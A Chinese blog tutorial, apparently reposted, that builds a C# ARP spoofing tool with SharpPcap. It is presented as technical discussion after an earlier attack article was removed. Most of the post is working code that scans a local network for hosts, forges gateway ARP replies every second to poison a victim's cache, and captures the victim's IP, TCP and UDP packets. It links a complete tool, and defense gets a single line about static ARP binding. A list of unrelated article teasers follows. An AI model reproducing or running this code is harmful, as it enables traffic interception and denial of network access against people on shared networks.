C# 通過ARP技術來觀察目標主機數據包

原創 南京大學網路工程13屆 2024-04-07 13:33

由於之前寫的C# 實現Arp欺詐的文章屬於網絡攻擊,不能夠被展示,所以這邊我們稍微說一下C#調用ARP包以及查看其他電腦上網數據包的技術,委婉的說一下ARP在局域網之中的應用。
本文章純屬技術討論,並且涵蓋了如何去防止ARP攻擊的手段。

目錄

ARP作用

學到一點網絡的都知道,ARP本身用於IP地址和MAC地址的轉換,主要是在七層網絡協議中,網絡層之下就是使用MAC地址進行通信了,這樣的設計本身也是底層可以無關上層通訊協議的變化而變化,而提供一個統一的接口。

比如局域網中的A主機和B主機,如果A主機的ARP緩存中有B主機的MAC地址,則直接發送數據到對應MAC地址,沒有則通過發送ARP廣播數據包的方式,根據迴應來更新ARP緩存。

ARP欺騙原理

創建一個arp包,將網關ip地址和錯誤的網關mac地址發送給目標主機,讓主機更新錯誤的mac-ip地址映射到緩存中。

工具

開源的.net arp庫: SharpPcap,PacketDotNet
項目中導入:

<PackageReference Include="PacketDotNet" Version="1.4.7" />
<PackageReference Include="SharpPcap" Version="6.2.5" />

實戰

獲取本機所有的網絡設備
LibPcapLiveDeviceList.Instance
獲取對應設備的ip和mac地址,以及網關ip
foreach (var address in LibPcapLiveDevice.Addresses)
{
    if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
    {
        //ipv4地址
        if (address.Addr.ipAddress.AddressFamily == AddressFamily.InterNetwork)
        {
            LocalIp = address.Addr.ipAddress;
            break;
        }
    }
}

foreach (var address in LibPcapLiveDevice.Addresses)
{
    if (address.Addr.type == Sockaddr.AddressTypes.HARDWARE)
    {
        LocalMac = address.Addr.hardwareAddress; // 本機MAC
    }
}

var gw = LibPcapLiveDevice.Interface.GatewayAddresses; // 網關IP
//ipv4的gateway
GatewayIp = gw?.FirstOrDefault(x => x.AddressFamily == AddressFamily.InterNetwork);
獲取網關mac地址

通過發送arp包到網關,獲取響應包,從響應包中獲取mac地址。
1.創建arp包

var ethernetPacket = new EthernetPacket(localMac, PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"), EthernetType.Arp);
var arpPacket = new ArpPacket(ArpOperation.Request, PhysicalAddress.Parse("00-00-00-00-00-00"), destinationIP, localMac, localIP);
ethernetPacket.PayloadPacket = arpPacket;

2.發送arp包到網關,並且等待下一個回覆包。

LibPcapLiveDevice.Open(DeviceModes.Promiscuous, 20);
LibPcapLiveDevice.Filter = arpFilter;
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
ArpPacket arpPacket = null;
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
    if (requestInterval < (DateTime.Now - lastRequestTime))
    {
        LibPcapLiveDevice.SendPacket(request);
        lastRequestTime = DateTime.Now;
    }

    if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
    {
        if (packet.Device.LinkType != LinkLayers.Ethernet)
        {
            continue;
        }
        var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
        arpPacket = pack.Extract<ArpPacket>();
        if (arpPacket == null)//是否是一個arp包
        {
            continue;
        }

        if (arpPacket.SenderProtocolAddress.Equals(destIP))
        {
            break;
        }
    }
}

// free the device
LibPcapLiveDevice.Close();
return arpPacket?.SenderHardwareAddress;
掃描局域網內活動ip和mac地址

1.設置掃描的ip區間,生成每個ip的arp請求包

var arpPackets = new Packet[targetIPList.Count];
for (int i = 0; i < arpPackets.Length; ++i)
{
    arpPackets[i] = BuildRequest(targetIPList[i], LocalMac, LocalIp);
}

2.發送arp包到各個ip,如果回覆了則在線,超時則認爲不活動

if (_cancellationTokenSource.IsCancellationRequested)
{
    break;
}
var lastRequestTime = DateTime.FromBinary(0);
var requestInterval = TimeSpan.FromMilliseconds(200);
var timeoutDateTime = DateTime.Now + _timeout;
while (DateTime.Now < timeoutDateTime)
{
    if (_cancellationTokenSource.IsCancellationRequested)
    {
        break;
    }

    if (requestInterval < (DateTime.Now - lastRequestTime))
    {
        LibPcapLiveDevice.SendPacket(arpPackets[i]);
        lastRequestTime = DateTime.Now;
    }

    if (LibPcapLiveDevice.GetNextPacket(out var packet) > 0)
    {
        if (packet.Device.LinkType != LinkLayers.Ethernet)
        {
            continue;
        }
        var pack = Packet.ParsePacket(packet.Device.LinkType, packet.Data.ToArray());
        var arpPacket = pack.Extract<ArpPacket>();
        if (arpPacket == null)
        {
            continue;
        }

        //回覆的arp包並且是我們請求的ip地址
        if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
        {
            Application.Current.Dispatcher.Invoke(() =>
            {
                ///增加到IPlist中
                Computers.Add(new Computer()
                {
                    IPAddress = arpPacket.SenderProtocolAddress.ToString(),
                    MacAddress = arpPacket.SenderHardwareAddress?.ToString(),
                });
            });

            break;
        }
    }
}
指定ip/ips攻擊

攻擊包就不能創建請求包, 應該僞造一個來自網關的響應包,從而將網關錯誤的mac地址更新到目標主機的緩存中。
1.創建錯誤的響應包

 private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
{
    var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetType.Arp);
    var arpPacket = new ArpPacket(ArpOperation.Response, destMac, destIP, senderMac, senderIP);
    ethernetPacket.PayloadPacket = arpPacket;
    return ethernetPacket;
}

調用創建arp響應包,但是可以看到最後一個mac地址,應該是網關的mac地址,我們替換成了自己本地mac地址。

BuildResponse(IPAddress.Parse(compute.IPAddress), PhysicalAddress.Parse(compute.MacAddress), GatewayIp, LocalMac);

2.直接以1000ms的間隔輪詢發送響應包到目標主機

var aTask = Task.Run(async () =>
{
    while (true)
    {
        if (_cancellationTokenSource1.IsCancellationRequested)
        {
            break;
        }
        try
        {
            LibPcapLiveDevice.SendPacket(packet);
        }
        catch (Exception ex)
        {
            MessageBox.Show(ex.Message);
        }

        await Task.Delay(1000);
    }
    LibPcapLiveDevice.Close();
}, _cancellationTokenSource1.Token);

獲取網絡數據包

此時的被攻擊的電腦,由於它的網關對應的MAC地址被我們替換成了自己電腦的MAC,所以原本通過網關發送的數據包,都會發送到我們電腦上來,我們不做任何處理就會導致電腦無法上網,我們可以通過監聽網卡查看來自該電腦的數據包,從而窺探一些請求。

/// <summary>
/// 監聽到攻擊的網卡收到的數據包
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void OnPacketArrival(object sender, PacketCapture e)
{
    try
    {
        var device = sender as LibPcapLiveDevice;
        var packet = Packet.ParsePacket(e.Device.LinkType, e.Data.ToArray());
        if (packet != null)
        {
            if (packet is EthernetPacket ethernetPacket) //數據包是以太網數據
            {
                var targetComputer = ArpAttackComputers.FirstOrDefault(x => x.MacAddress == ethernetPacket.SourceHardwareAddress.ToString());

                if (targetComputer != null)
                {
                    var ipPacket = ethernetPacket.Extract<IPPacket>();
                    if (ipPacket != null)
                    {
                        var packetViewModel = new PacketViewModel();
                        packetViewModel.SourceIpAddress = ipPacket.SourceAddress.ToString();
                        packetViewModel.TargetIpAddress = ipPacket.DestinationAddress.ToString();

                        var udpPacket = ipPacket.Extract<UdpPacket>();
                        var tcpPacket = ipPacket.Extract<TcpPacket>();
                        packetViewModel.Type = "IP";

                        if (udpPacket != null)
                        {
                            packetViewModel.SourcePort = udpPacket.SourcePort;
                            packetViewModel.TargetPort = udpPacket.DestinationPort;
                            packetViewModel.Type = "UDP";
                        }

                        if (tcpPacket != null)
                        {
                            packetViewModel.SourcePort = tcpPacket.SourcePort;
                            packetViewModel.TargetPort = tcpPacket.DestinationPort;
                            packetViewModel.Type = "TCP";
                        }

                        targetComputer.AddPacket(packetViewModel);
                    }
                    else
                    {
                        ///mac地址沒啥好記錄的都知道了
                        var packetViewModel = new PacketViewModel();
                        packetViewModel.Type = "以太網";
                        targetComputer.AddPacket(packetViewModel);
                    }
                }
            }
        }
    }
    catch (Exception) 
    {
    }
}

我們解析了IP數據包,TCP以及UDP包。

工具頁面

image

如何預防?

一般只需要本地將網關和MAC地址靜態綁定即可。

完整代碼和工具

https://github.com/BruceQiu1996/ArpSpoofing

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

關於遊戲付費的一點想法

最近被問到,爲什麼玩原神只花了1000多塊錢,我被問住了,不知該作何反應。這裏打算重新整理一下思路,嘗試回答。 首先談談錢,對於一般打工人來說,金錢是勞動的憑證,我們可以用它來兌換其他人的勞動成果。在買斷制、點卡制遊戲中,金錢體現了這種性質

氫氦 2024-05-01 14:37:05

url重寫重定向所有http網址到https網址

web.config中輸入一下內容 <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <rewrite>

hiningrise 2024-05-01 14:30:04

linux導出安裝包

linux導出安裝包 1 背景 部署企業內網環境,主機無法連通外網.不能直接使用yum install安裝程序.針對此種情況有如下兩個安裝辦法 源碼安裝(需要編譯環境,安裝複雜,容易出錯,不推薦) 使用rpm離線安裝(需要離線安裝包,簡單

herbert 2024-05-01 14:29:44

推薦3款程序員常用的畫圖工具

前言 經常看到有小夥伴在DotNetGuide技術社區微信交流羣裏問:有什麼好用的畫圖工具推薦的?今天大姚給大家推薦3款程序員日常工作中常用的畫圖工具,大家可以根據自己的需求選擇。 ProcessOn ProcessOn是一款專業強大在線作

追逐時光 2024-05-01 14:25:24

vscode 刷python代碼格式

安裝black format 之後alt+ shift +f即可.

張博的博客 2024-05-01 14:22:13

關於JSON轉字符串後前端與python得到的結果不一致的問題,及對象按key排序

背景:   哈希碼參數校驗防參數篡改。前端下發接口時對參數按約定祕鑰和邏輯進行加密,後端在獲取到請求後對請求參數以同樣的祕鑰和邏輯加密計算得出哈希值,再與請求的哈希值對比,如果不一致則證明參數被篡改。 前端代碼:   對json對象進行了按

TheFirstDream 2024-05-01 14:21:43

mycat啓動報錯Could not reserve enough space for 2097152KB object heap

mycat啓動報錯: 報錯1:Could not reserve enough space for 2097152KB object heap 找到wrapper.conf修改內存大小爲1G   # Initial Java Heap

uper超人 2024-05-01 14:15:42

《最新出爐》系列入門篇-Python+Playwright自動化測試-42-強大的可視化追蹤利器Trace Viewer

1.簡介 在我們日常執行自動化測試工作的過程中,經常會遇到一些偶發性的bug,但是因爲bug是偶發性的,我們不一定每次執行都能復現,所以我們在測試執行的時候,追蹤用例執行就變得非常重要了。playwright提供了一個Playwright

北京-宏哥 2024-05-01 14:14:41

前端使用 Konva 實現可視化設計器(8)- 預覽框

請大家動動小手,給我一個免費的 Star 吧~ 大家如果發現了明顯的 Bug,可以提 Issue 喲~ 這一章我們實現一個預覽框,實時、可交互定位的。 github源碼 gitee源碼 示例地址 預覽框 定位方法 移動畫布,將傳入

xachary 2024-05-01 14:08:11

大數據怎麼學?對大數據開發領域及崗位的詳細解讀,完整理解大數據開發領域技術體系

經常有小夥伴和我諮詢大數據怎麼學,我覺得有必要寫一下關於大數據開發的具體方向,下次就不用苦哈哈的打字回覆了。直接回覆文章。 1.大數據崗位劃分 我們通常說的大數據開發主要分爲三大方向: 1.1數據平臺開發工程師 主要從事後端開發,結合Had

魯邊 2024-05-01 14:06:40

如何使用python發郵件

import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText def send_email(send

vye001 2024-05-01 14:06:10

我通過CKA和CKS啦!

作爲一個運維狗,考下Kubernetes認證可以說是職業基本素養之一了。 我是去年6月買的bundle,當時打了6折,435刀(摺合人民幣3100多),晃悠大半年才發現再不考就過期了,所以開始着手準備。肝了一段時間,總算拿下雙證! 可喜可賀

Young233 2024-05-01 14:04:30

.NET 中使用 GaussDB C# ORM

openGauss(GaussDB ) openGauss是一款全面友好開放,攜手夥伴共同打造的企業級開源關係型數據庫。openGauss採用木蘭寬鬆許可證v2發行,提供面向多核架構的極致性能、全鏈路的業務、數據安全、基於AI的調優和高效運

孫凱旋 2024-05-01 14:03:39

.NET中使用 openGauss C# ORM

openGauss(GaussDB ) openGauss是一款全面友好開放,攜手夥伴共同打造的企業級開源關係型數據庫。openGauss採用木蘭寬鬆許可證v2發行,提供面向多核架構的極致性能、全鏈路的業務、數據安全、基於AI的調優和高效運

孫凱旋 2024-05-01 14:03:39

基於SSM的校園論壇網站系統畢業設計論文【範文】

摘要 隨着信息技術的不斷進步與深入應用,校園論壇系統作爲高校師生信息交流、知識共享和意見交換的重要網絡平臺,其作用日益凸顯。基於此背景,本畢業設計論文旨在開發一個基於SSM(Spring + Spring MVC + MyBatis)框架的

Lucky帥小武 2024-05-01 14:03:29